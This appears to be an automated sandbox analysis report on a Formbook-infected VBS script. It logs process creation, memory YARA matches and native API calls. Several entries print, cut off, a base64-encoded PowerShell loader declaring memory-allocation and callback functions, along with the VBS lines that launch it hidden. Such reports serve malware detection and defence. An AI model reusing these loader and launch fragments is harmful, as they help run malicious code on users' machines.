      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAY
      Potential malicious VBS script found (suspicious strings)Show sources
      Source: Initial file: obj1.ShellExecute MyFile , " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
      Source: Initial file: obj1.ShellExecute "powershell.exe", " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
      Very long command line foundShow sources
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7149
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7149
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00D1CDF8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00D1DED8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07617E00
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07617E00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD2EF7
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDCD616
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED26E30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD1FF1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDCD466
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1841F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD25DD
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1D5E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED32581
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD1D55
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD2D07
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED00D20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD22AE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDCDBD2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3EBB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD2B28
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD28EC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1B090
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED320A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD20A8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1002
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED0F900
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED24120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E841F
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489D466
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04802581
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A25DD
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D0D20
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A2D07
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047ED5E0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A1D55
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F6E30
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A2EF7
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489D616
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048ADFCE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A1FF1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A20A8
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA830
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A28EC
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04891002
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048AE824
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047EB090
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F4120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DF900
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A22AE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0488FA2B
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480EBB0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FAB40
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048903DA
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489DBD2
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A2B28
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00632D8F
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00632D90
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00639E60
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064DE6D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00639E5C
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064D70F
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00632FB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1ED0B150 appears 35 times
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 047DB150 appears 54 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED496E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED497A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49540 NtReadFile,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED498F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED499A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED496D0 NtCreateKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49650 NtQueryValueKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49670 NtQueryInformationProcess,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49610 NtEnumerateValueKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49FE0 NtCreateMutant,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4A770 NtOpenThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49770 NtSetInformationFile,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49760 NtOpenProcess,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4A710 NtOpenProcessToken,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49730 NtQueryVirtualMemory,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED495D0 NtClose,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED495F0 NtQueryInformationFile,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49560 NtWriteFile,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4AD30 NtSetContextThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49520 NtWaitForSingleObject,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A80 NtOpenDirectoryObject,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A10 NtQuerySection,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4A3B0 NtGetContextThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49B00 NtSetValueKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED498A0 NtWriteVirtualMemory,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4B040 NtSuspendThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49820 NtEnumerateKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED499D0 NtCreateProcessEx,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048195D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819560 NtWriteFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048196D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048196E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819610 NtEnumerateValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819770 NtSetInformationFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048199A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819B00 NtSetValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048195F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481AD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048197A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481A710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481A770 NtOpenThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048198A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048198F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481B040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048199D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481A3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A370 NtCreateFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A420 NtReadFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A4A0 NtClose,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A550 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A36B NtCreateFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A41A NtReadFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A49A NtClose,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A54B NtAllocateVirtualMemory,
      Source: MTIR22024323_0553381487_20220112120005.vbsInitial sample: Strings found which are bigger than 50
      Source: MTIR22024323_0553381487_20220112120005.vbsReversingLabs: Detection: 12%
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACk